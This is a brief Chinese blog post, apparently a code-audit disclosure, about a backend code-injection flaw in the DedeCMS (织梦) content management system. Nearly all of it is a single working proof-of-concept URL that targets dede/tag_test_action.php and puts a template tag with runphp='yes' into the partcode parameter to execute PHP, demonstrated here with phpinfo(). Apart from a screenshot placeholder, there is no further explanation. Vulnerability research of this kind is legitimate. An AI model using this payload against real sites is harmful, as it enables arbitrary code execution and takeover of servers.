代码审计之织梦最新版后台代码注入

1、payload如下:

1
http://localhost/dede/tag_test_action.php?url=a&token=&partcode={dede:mochazz name='source' runphp='yes'}phpinfo();{/dede:mochazz}

2、效果图:

1

阅读更多